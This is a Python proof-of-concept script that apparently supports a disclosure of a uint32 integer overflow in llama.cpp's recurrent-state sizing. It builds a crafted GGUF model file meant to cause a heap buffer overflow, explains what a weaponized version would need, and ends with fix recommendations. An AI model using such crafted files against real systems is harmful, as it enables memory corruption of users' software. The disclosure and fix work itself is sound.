File size: 25,559 Bytes
e7f59c8
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
#!/usr/bin/env python3
"""
PoC: uint32_t integer overflow in llama_hparams::n_embd_s() and n_embd_r()
=====================================================================================

VULNERABILITY SUMMARY:
  In llama.cpp, the functions n_embd_s() and n_embd_r() in src/llama-hparams.cpp
  compute recurrent state buffer sizes using uint32_t arithmetic. When the product
  of attacker-controlled GGUF metadata values exceeds 2^32, silent integer overflow
  causes allocation of undersized buffers. Subsequent writes to these buffers during
  inference cause heap buffer overflow.

AFFECTED FUNCTIONS (src/llama-hparams.cpp):
  1. n_embd_s() line 158: return n_embd * wkv_head_size;          [RWKV6/RWKV7]
  2. n_embd_s() line 169: return ssm_d_state * ssm_d_inner;       [Mamba/Mamba2]
  3. n_embd_s() line 165: return n_embd_head_kda * n_embd_head_kda * n_head(); [Kimi KDA]
  4. n_embd_r() line 134: return token_shift_count * n_embd;       [RWKV6/RWKV7]
  5. n_embd_r() line 139: return n_embd * (n_shortconv_l_cache-1); [LFM2]
  6. n_embd_r() line 152: return (ssm_d_conv-1) * (ssm_d_inner + 2*ssm_n_group*ssm_d_state); [Mamba]

ALLOCATION SITE (src/llama-memory-recurrent.cpp lines 94-95):
  ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
  ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);

  Note: n_embd_r() returns uint32_t, mem_size is uint32_t, so the multiplication
  hparams.n_embd_r()*mem_size is ALSO in uint32_t and may overflow again before
  being widened to int64_t for ggml_new_tensor_1d.

NO INPUT VALIDATION:
  There are no range checks on wkv_head_size, ssm_d_state, ssm_d_inner,
  n_shortconv_l_cache, n_embd_head_kda, or token_shift_count. Values are read
  directly from untrusted GGUF metadata into uint32_t fields.

TRIGGER SEQUENCE:
  1. llama_load_model_from_file() -> load_hparams() reads overflow-inducing values
  2. load_tensors() loads model weights (tensors sized with int64_t, no overflow there)
  3. llama_new_context_with_model() -> create_memory() -> llama_memory_recurrent()
     calls n_embd_s() / n_embd_r() with uint32_t overflow -> undersized allocation
  4. During inference, recurrent state is written into the undersized buffer -> HEAP OOB

ASAN DETECTION:
  Yes, ASan would detect the heap-buffer-overflow during inference when the recurrent
  state write exceeds the allocated buffer. The overflow at step 3 is silent (no UB
  in C/C++ for unsigned wrap-around), but the resulting OOB write at step 4 is
  detected by ASan.

This script generates a minimal GGUF file demonstrating the vulnerability.
"""

import struct
import sys
import os
import numpy as np

# --------------------------------------------------------------------------
# Constants from GGUF specification
# --------------------------------------------------------------------------
GGUF_MAGIC = 0x46554747  # "GGUF" as uint32 little-endian (bytes: 47 47 55 46)
GGUF_VERSION = 3

# GGUF value types
GGUF_TYPE_UINT32  = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING  = 8
GGUF_TYPE_ARRAY   = 9
GGUF_TYPE_UINT8   = 0

# GGML tensor types
GGML_TYPE_F32 = 0

UINT32_MAX = 0xFFFFFFFF


def uint32_overflow(val):
    """Simulate uint32_t overflow (C unsigned wrap-around)."""
    return val & UINT32_MAX


def analyze_overflow_scenarios():
    """Print analysis of all overflow scenarios."""
    print("=" * 78)
    print("OVERFLOW ANALYSIS FOR ALL VULNERABLE FUNCTIONS")
    print("=" * 78)

    # --- Scenario 1: RWKV6 n_embd_s() ---
    print("\n--- Scenario 1: RWKV6 n_embd_s() = n_embd * wkv_head_size ---")
    n_embd = 65537
    wkv_head_size = 65537
    correct = n_embd * wkv_head_size
    overflowed = uint32_overflow(correct)
    print(f"  n_embd           = {n_embd}")
    print(f"  wkv_head_size    = {wkv_head_size}")
    print(f"  Correct product  = {correct} (0x{correct:X})")
    print(f"  uint32 overflow  = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio            = {correct / overflowed:.1f}x undersized")
    print(f"  Correct buffer (1 seq, f32) = {correct * 4 / (1024**2):.1f} MiB")
    print(f"  Overflow buffer (1 seq, f32) = {overflowed * 4 / (1024**2):.1f} MiB")

    # --- Scenario 2: Mamba n_embd_s() ---
    print("\n--- Scenario 2: Mamba n_embd_s() = ssm_d_state * ssm_d_inner ---")
    n_embd_mamba = 2
    ssm_d_inner = 2 * n_embd_mamba  # constraint: d_inner = 2 * n_embd
    ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2  # just enough to overflow
    correct = ssm_d_state * ssm_d_inner
    overflowed = uint32_overflow(correct)
    print(f"  n_embd           = {n_embd_mamba}")
    print(f"  ssm_d_inner      = {ssm_d_inner} (= 2 * n_embd)")
    print(f"  ssm_d_state      = {ssm_d_state}")
    print(f"  Correct product  = {correct} (0x{correct:X})")
    print(f"  uint32 overflow  = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio            = {correct / max(overflowed, 1):.1f}x undersized")

    # --- Scenario 3: Kimi KDA n_embd_s() ---
    print("\n--- Scenario 3: Kimi KDA n_embd_s() = n_embd_head_kda^2 * n_head ---")
    n_embd_head_kda = 11586  # 11586^2 * 32 > 2^32
    n_head = 32
    correct = n_embd_head_kda * n_embd_head_kda * n_head
    overflowed = uint32_overflow(correct)
    print(f"  n_embd_head_kda  = {n_embd_head_kda}")
    print(f"  n_head           = {n_head}")
    print(f"  Correct product  = {correct} (0x{correct:X})")
    print(f"  uint32 overflow  = {overflowed} (0x{overflowed:X})")
    if overflowed > 0:
        print(f"  Ratio            = {correct / overflowed:.1f}x undersized")
    else:
        print(f"  Wraps to ZERO -- ggml_new_tensor_1d with size 0!")

    # --- Scenario 4: LFM2 n_embd_r() ---
    print("\n--- Scenario 4: LFM2 n_embd_r() = n_embd * (n_shortconv_l_cache - 1) ---")
    n_embd_lfm = 4096
    n_shortconv_l_cache = 1048578  # n_embd * (1048578-1) = 4096 * 1048577 > 2^32
    correct = n_embd_lfm * (n_shortconv_l_cache - 1)
    overflowed = uint32_overflow(correct)
    print(f"  n_embd              = {n_embd_lfm}")
    print(f"  n_shortconv_l_cache = {n_shortconv_l_cache}")
    print(f"  Correct product     = {correct} (0x{correct:X})")
    print(f"  uint32 overflow     = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio               = {correct / overflowed:.1f}x undersized")

    # --- Scenario 5: Mamba n_embd_r() complex ---
    print("\n--- Scenario 5: Mamba n_embd_r() = (d_conv-1)*(d_inner + 2*n_group*d_state) ---")
    ssm_d_conv = 5
    ssm_d_inner_r = 512
    ssm_n_group = 32768
    ssm_d_state_r = 32769
    subexpr = ssm_d_inner_r + uint32_overflow(2 * ssm_n_group * ssm_d_state_r)
    correct_sub = ssm_d_inner_r + 2 * ssm_n_group * ssm_d_state_r
    correct = (ssm_d_conv - 1) * correct_sub
    overflowed_sub = uint32_overflow(2 * ssm_n_group * ssm_d_state_r)
    overflowed = uint32_overflow((ssm_d_conv - 1) * uint32_overflow(ssm_d_inner_r + overflowed_sub))
    print(f"  ssm_d_conv   = {ssm_d_conv}")
    print(f"  ssm_d_inner  = {ssm_d_inner_r}")
    print(f"  ssm_n_group  = {ssm_n_group}")
    print(f"  ssm_d_state  = {ssm_d_state_r}")
    print(f"  2*n_group*d_state = {2*ssm_n_group*ssm_d_state_r} (correct)")
    print(f"  2*n_group*d_state = {overflowed_sub} (uint32 overflow)")
    print(f"  Full correct      = {correct}")
    print(f"  Full overflowed   = {overflowed}")

    # --- Scenario 6: Double overflow at allocation site ---
    print("\n--- Scenario 6: Double overflow at allocation site (line 94-95) ---")
    print("  Even if n_embd_s() doesn't overflow, the multiplication")
    print("  n_embd_s() * mem_size on line 95 is ALSO in uint32_t!")
    n_embd_s_val = 65536  # legitimate n_embd_s value
    mem_size = 65537
    correct = n_embd_s_val * mem_size
    overflowed = uint32_overflow(correct)
    print(f"  n_embd_s() = {n_embd_s_val}")
    print(f"  mem_size   = {mem_size}")
    print(f"  Correct    = {correct} (0x{correct:X})")
    print(f"  Overflowed = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio      = {correct / max(overflowed, 1):.1f}x undersized")

    print("\n" + "=" * 78)


# --------------------------------------------------------------------------
# GGUF binary writer (minimal, hand-crafted)
# --------------------------------------------------------------------------
def write_gguf_string(f, s):
    """Write a GGUF string (uint64 length + bytes, no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)


def write_gguf_kv_string(f, key, value):
    """Write a string KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_gguf_string(f, value)


def write_gguf_kv_uint32(f, key, value):
    """Write a uint32 KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))


def write_gguf_kv_float32(f, key, value):
    """Write a float32 KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))


def write_gguf_kv_string_array(f, key, values):
    """Write a string array KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        write_gguf_string(f, v)


def write_gguf_kv_float32_array(f, key, values):
    """Write a float32 array KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<f', v))


def write_gguf_kv_int32_array(f, key, values):
    """Write an int32 array KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<I', v))


def write_tensor_info(f, name, ndims, shape, dtype):
    """Write tensor info entry in GGUF header."""
    write_gguf_string(f, name)
    f.write(struct.pack('<I', ndims))
    for dim in shape:
        f.write(struct.pack('<Q', dim))
    f.write(struct.pack('<I', dtype))
    f.write(struct.pack('<Q', 0))  # offset (will be 0 for first tensor, cumulative for rest)


def generate_mamba_poc_gguf(output_path):
    """
    Generate a minimal GGUF file targeting the Mamba architecture with
    ssm_d_state and ssm_d_inner values chosen to overflow n_embd_s().

    Due to the constraint d_inner = 2*n_embd and the fact that ssm_d_state
    appears directly in tensor dimensions (ssm_a: {d_state, d_inner}),
    a fully loadable PoC requires large tensors (~16GB+). This PoC creates
    a structurally valid GGUF header demonstrating the overflow parameters.
    Tensor data is provided as minimal stubs.

    For a fully weaponized exploit, one would need to provide correctly-sized
    tensor data, which is feasible (many real models are 16GB+) but impractical
    for a PoC demonstration.
    """
    # Overflow parameters for Mamba n_embd_s()
    n_embd = 2
    n_vocab = 4
    n_layer = 1
    ssm_d_inner = 2 * n_embd  # = 4 (required: d_inner == 2*n_embd)
    ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2  # 1073741825
    ssm_d_conv = 4
    ssm_dt_rank = 1

    correct_n_embd_s = ssm_d_state * ssm_d_inner
    overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)

    print(f"\n{'='*78}")
    print("GENERATING MAMBA PoC GGUF FILE")
    print(f"{'='*78}")
    print(f"  Architecture:    mamba")
    print(f"  n_embd:          {n_embd}")
    print(f"  n_layer:         {n_layer}")
    print(f"  ssm_d_inner:     {ssm_d_inner}")
    print(f"  ssm_d_state:     {ssm_d_state}")
    print(f"  ssm_d_conv:      {ssm_d_conv}")
    print(f"  ssm_dt_rank:     {ssm_dt_rank}")
    print(f"")
    print(f"  n_embd_s() CORRECT value:    {correct_n_embd_s}")
    print(f"  n_embd_s() OVERFLOWED value: {overflowed_n_embd_s}")
    print(f"  Allocated buffer is {correct_n_embd_s / max(overflowed_n_embd_s, 1):.0f}x too small!")
    print(f"")
    print(f"  n_embd_r() = (d_conv-1) * d_inner = {(ssm_d_conv-1) * ssm_d_inner}")
    print(f"  (n_embd_r does not overflow with these params)")
    print()

    # Define tensors needed for Mamba (per llama-arch.cpp lines 1351-1364)
    # NOTE: Tensor shapes include d_state which makes them very large.
    # We provide minimal stub data to demonstrate the GGUF structure.
    tensors = []
    tensor_data_list = []

    def add_tensor(name, shape):
        n_elements = 1
        for d in shape:
            n_elements *= d
        data = np.zeros(min(n_elements, 64), dtype=np.float32)  # stub: only first 64 elements
        tensors.append((name, len(shape), shape, GGML_TYPE_F32))
        tensor_data_list.append(data)

    # Global tensors
    add_tensor("token_embd.weight", [n_embd, n_vocab])
    add_tensor("output_norm.weight", [n_embd])
    add_tensor("output.weight", [n_embd, n_vocab])

    # Per-layer tensors (1 layer)
    for i in range(n_layer):
        add_tensor(f"blk.{i}.attn_norm.weight", [n_embd])
        add_tensor(f"blk.{i}.ssm_in.weight", [n_embd, 2 * ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_conv1d.weight", [ssm_d_conv, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_conv1d.bias", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_x.weight", [ssm_d_inner, ssm_dt_rank + 2 * ssm_d_state])
        add_tensor(f"blk.{i}.ssm_dt.weight", [ssm_dt_rank, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_dt.bias", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_a", [ssm_d_state, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_d", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_out.weight", [ssm_d_inner, n_embd])

    # KV pairs for GGUF metadata
    kv_pairs = []
    n_kv = 0

    # Write GGUF file
    with open(output_path, 'wb') as f:
        # We'll write the header later once we know the structure
        header_pos = f.tell()

        # Count KV pairs
        # We need: general.architecture, general.name,
        #          mamba.context_length, mamba.embedding_length, mamba.block_count,
        #          mamba.ssm.conv_kernel, mamba.ssm.inner_size, mamba.ssm.state_size,
        #          mamba.ssm.time_step_rank, mamba.attention.layer_norm_rms_epsilon,
        #          tokenizer.ggml.model, tokenizer.ggml.tokens, tokenizer.ggml.scores,
        #          tokenizer.ggml.token_type
        n_kv = 14
        n_tensors = len(tensors)

        # GGUF header
        f.write(struct.pack('<I', GGUF_MAGIC))
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # KV data
        write_gguf_kv_string(f, "general.architecture", "mamba")
        write_gguf_kv_string(f, "general.name", "overflow-poc-mamba")
        write_gguf_kv_uint32(f, "mamba.context_length", 2048)
        write_gguf_kv_uint32(f, "mamba.embedding_length", n_embd)
        write_gguf_kv_uint32(f, "mamba.block_count", n_layer)
        write_gguf_kv_uint32(f, "mamba.ssm.conv_kernel", ssm_d_conv)
        write_gguf_kv_uint32(f, "mamba.ssm.inner_size", ssm_d_inner)
        write_gguf_kv_uint32(f, "mamba.ssm.state_size", ssm_d_state)
        write_gguf_kv_uint32(f, "mamba.ssm.time_step_rank", ssm_dt_rank)
        write_gguf_kv_float32(f, "mamba.attention.layer_norm_rms_epsilon", 1e-5)

        # Minimal tokenizer
        write_gguf_kv_string(f, "tokenizer.ggml.model", "gpt2")
        tokens = ["<pad>", "<eos>", "a", "b"]
        write_gguf_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
        write_gguf_kv_float32_array(f, "tokenizer.ggml.scores", [0.0] * len(tokens))
        write_gguf_kv_int32_array(f, "tokenizer.ggml.token_type", [0] * len(tokens))

        # Tensor info
        # NOTE: We write the correct shapes (which are very large for ssm_a, ssm_x)
        # but only provide stub data. This makes the file small but structurally valid.
        # A real exploit would need to provide full tensor data.
        data_offset = 0
        for name, ndims, shape, dtype in tensors:
            write_gguf_string(f, name)
            f.write(struct.pack('<I', ndims))
            for dim in shape:
                f.write(struct.pack('<Q', dim))
            f.write(struct.pack('<I', dtype))
            f.write(struct.pack('<Q', data_offset))
            # Calculate actual data size for this tensor
            n_elements = 1
            for d in shape:
                n_elements *= d
            data_size = min(n_elements, 64) * 4  # f32 = 4 bytes, but we only store stub
            # Align to 32 bytes
            aligned_size = (data_size + 31) & ~31
            data_offset += aligned_size

        # Align to data alignment boundary (default 32)
        current_pos = f.tell()
        alignment = 32
        padding = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding)

        # Tensor data (stubs)
        for data in tensor_data_list:
            f.write(data.tobytes())
            # Pad to 32-byte alignment
            data_size = len(data) * 4
            pad = (alignment - (data_size % alignment)) % alignment
            f.write(b'\x00' * pad)

    file_size = os.path.getsize(output_path)
    print(f"  Output:          {output_path}")
    print(f"  File size:       {file_size} bytes ({file_size/1024:.1f} KiB)")
    print()
    print("  NOTE: This GGUF file has correct overflow-inducing metadata but")
    print("  truncated tensor data. The hparams will parse correctly and the")
    print("  overflow will compute during context creation, but tensor loading")
    print("  will fail due to insufficient data. A full exploit requires ~16GB")
    print("  of tensor data (realistic for real model files).")
    print()
    return output_path


def generate_rwkv6_poc_gguf(output_path):
    """
    Generate a minimal GGUF targeting RWKV6 architecture.
    n_embd_s() = n_embd * wkv_head_size overflows to small value.

    For RWKV6, wkv_head_size appears in tensor shape {head_size, n_embd/head_size},
    requiring n_embd >= wkv_head_size. The minimum overflow case is:
      n_embd = 65537, wkv_head_size = 65537
      n_embd_s() = 65537 * 65537 = 4295098369 -> wraps to 131073 in uint32

    However, tensors like time_mix_key {n_embd, n_embd} = {65537, 65537} require
    ~16GB, making a compact PoC file impractical.
    """
    n_embd = 65537
    wkv_head_size = 65537
    n_layer = 1
    n_vocab = 4
    time_mix_extra_dim = 32
    time_decay_extra_dim = 64
    ffn_size = 4  # minimal feed-forward size

    correct_n_embd_s = n_embd * wkv_head_size
    overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)

    correct_n_embd_r = 2 * n_embd  # token_shift_count defaults to 2
    overflowed_n_embd_r = uint32_overflow(correct_n_embd_r)

    print(f"\n{'='*78}")
    print("RWKV6 OVERFLOW ANALYSIS")
    print(f"{'='*78}")
    print(f"  n_embd:          {n_embd}")
    print(f"  wkv_head_size:   {wkv_head_size}")
    print(f"  n_embd_s() correct:    {correct_n_embd_s} ({correct_n_embd_s * 4 / (1024**3):.1f} GiB as f32)")
    print(f"  n_embd_s() overflowed: {overflowed_n_embd_s} ({overflowed_n_embd_s * 4 / (1024**2):.1f} MiB as f32)")
    print(f"  Buffer undersized by:  {correct_n_embd_s / overflowed_n_embd_s:.0f}x")
    print(f"  n_embd_r() correct:    {correct_n_embd_r} (no overflow)")
    print()

    # For RWKV6, key tensors and their sizes:
    print("  Key tensor sizes (showing why full PoC file is large):")
    print(f"    token_embd    {{n_embd, n_vocab}}     = {{{n_embd}, {n_vocab}}}     = {n_embd*n_vocab*4/(1024**2):.1f} MiB")
    print(f"    time_mix_key  {{n_embd, n_embd}}      = {{{n_embd}, {n_embd}}}      = {n_embd*n_embd*4/(1024**3):.1f} GiB")
    print(f"    time_mix_first {{head_sz, n_embd/hs}} = {{{wkv_head_size}, {n_embd//wkv_head_size}}} = {wkv_head_size*(n_embd//wkv_head_size)*4/1024:.1f} KiB")
    print()

    # We don't actually create this file since the tensors would be huge.
    # The Mamba PoC above demonstrates the GGUF structure.
    print("  (RWKV6 GGUF file not generated -- tensor data would be ~16GB)")
    print("  The vulnerability is the same code path as Mamba, just different parameters.")


def print_vulnerable_code():
    """Print the exact vulnerable code for reference."""
    print(f"\n{'='*78}")
    print("VULNERABLE CODE REFERENCES")
    print(f"{'='*78}")
    print("""
FILE: src/llama-hparams.cpp

  Line 131-134 (n_embd_r for RWKV):
    uint32_t llama_hparams::n_embd_r() const {
        if (wkv_head_size != 0) {
            return token_shift_count * n_embd;  // OVERFLOW: uint32 * uint32
        }

  Line 137-139 (n_embd_r for LFM2):
        if (n_shortconv_l_cache != 0) {
            return n_embd * (n_shortconv_l_cache - 1);  // OVERFLOW: uint32 * uint32
        }

  Line 152 (n_embd_r for Mamba):
        return (ssm_d_conv > 0 ? ssm_d_conv - 1 : 0)
             * (ssm_d_inner + 2*ssm_n_group*ssm_d_state);  // OVERFLOW: multiple uint32 ops

  Line 155-158 (n_embd_s for RWKV):
    uint32_t llama_hparams::n_embd_s() const {
        if (wkv_head_size != 0) {
            return n_embd * wkv_head_size;  // OVERFLOW: uint32 * uint32
        }

  Line 161-165 (n_embd_s for Kimi KDA):
        if (n_embd_head_kda != 0) {
            return n_embd_head_kda * n_embd_head_kda * n_head();  // OVERFLOW: triple uint32

  Line 169 (n_embd_s for Mamba):
        return ssm_d_state * ssm_d_inner;  // OVERFLOW: uint32 * uint32

FILE: src/llama-memory-recurrent.cpp

  Line 94-95 (allocation with overflowed size):
    ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
    ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);
    // DOUBLE OVERFLOW: n_embd_r()/n_embd_s() returns uint32_t,
    // multiplication with mem_size (uint32_t) can overflow AGAIN
    // before widening to int64_t parameter of ggml_new_tensor_1d

FILE: src/llama-hparams.h

  All overflow-prone fields are uint32_t (no validation, no range checks):
    Line 44:  uint32_t n_embd;
    Line 62:  uint32_t n_shortconv_l_cache = 0;
    Line 99:  uint32_t wkv_head_size = 0;
    Line 100: uint32_t token_shift_count = 2;
    Line 133: uint32_t ssm_d_conv = 0;
    Line 134: uint32_t ssm_d_inner = 0;
    Line 135: uint32_t ssm_d_state = 0;
    Line 137: uint32_t ssm_n_group = 0;
    Line 140: uint32_t n_embd_head_kda = 0;
""")


def print_fix_recommendation():
    """Print recommended fix."""
    print(f"\n{'='*78}")
    print("RECOMMENDED FIX")
    print(f"{'='*78}")
    print("""
The fix should address both the return type and the arithmetic:

1. Change n_embd_r() and n_embd_s() return types from uint32_t to uint64_t:

   uint64_t llama_hparams::n_embd_r() const {
       if (wkv_head_size != 0) {
           return (uint64_t)token_shift_count * n_embd;
       }
       ...

   uint64_t llama_hparams::n_embd_s() const {
       if (wkv_head_size != 0) {
           return (uint64_t)n_embd * wkv_head_size;
       }
       ...

2. Fix the allocation site in llama-memory-recurrent.cpp:

   // Cast to int64_t before multiplying with mem_size
   ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, (int64_t)hparams.n_embd_r() * mem_size);
   ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, (int64_t)hparams.n_embd_s() * mem_size);

3. Add validation of hparams values after loading from GGUF:

   // Validate that products won't cause unreasonable allocations
   uint64_t embd_s = (uint64_t)ssm_d_state * ssm_d_inner;
   if (embd_s > INT32_MAX) {
       throw std::runtime_error("ssm state size overflow");
   }
""")


def main():
    print("=" * 78)
    print("PoC: uint32_t Integer Overflow in llama_hparams::n_embd_s() / n_embd_r()")
    print("Target: llama.cpp GGUF model loading (recurrent state buffer allocation)")
    print("=" * 78)

    # Analyze all overflow scenarios
    analyze_overflow_scenarios()

    # Print vulnerable code references
    print_vulnerable_code()

    # Generate Mamba PoC GGUF
    poc_dir = os.path.dirname(os.path.abspath(__file__))
    mamba_poc_path = os.path.join(poc_dir, "poc_mamba_overflow.gguf")
    generate_mamba_poc_gguf(mamba_poc_path)

    # Analyze RWKV6 overflow
    generate_rwkv6_poc_gguf(None)

    # Print fix recommendation
    print_fix_recommendation()

    print(f"\n{'='*78}")
    print("SUMMARY")
    print(f"{'='*78}")
    print("""
VULNERABILITY: Integer overflow in n_embd_s()/n_embd_r() (uint32_t arithmetic)

IMPACT: Heap buffer overflow via undersized recurrent state allocation.
  - Attacker crafts GGUF with metadata values whose product exceeds 2^32
  - n_embd_s()/n_embd_r() silently wraps to a small value
  - Small buffer is allocated for recurrent state
  - During inference, full-sized state data is written to undersized buffer
  - Results in heap-buffer-overflow (detectable by ASan)

SEVERITY: High
  - Triggered by loading a malicious GGUF file (no special flags needed)
  - Affects all recurrent architectures: Mamba, Mamba2, RWKV6, RWKV7, LFM2, Kimi
  - No input validation on the overflow-prone metadata fields
  - Overflow is in model loading path, not just inference

ROOT CAUSE: uint32_t return type and arithmetic in n_embd_s()/n_embd_r()
  combined with lack of validation on GGUF metadata values.

AFFECTED CODE:
  - src/llama-hparams.cpp: lines 134, 139, 146, 152, 158, 165, 169
  - src/llama-memory-recurrent.cpp: lines 94-95
  - src/llama-hparams.h: uint32_t field declarations (no range checks)
""")


if __name__ == "__main__":
    main()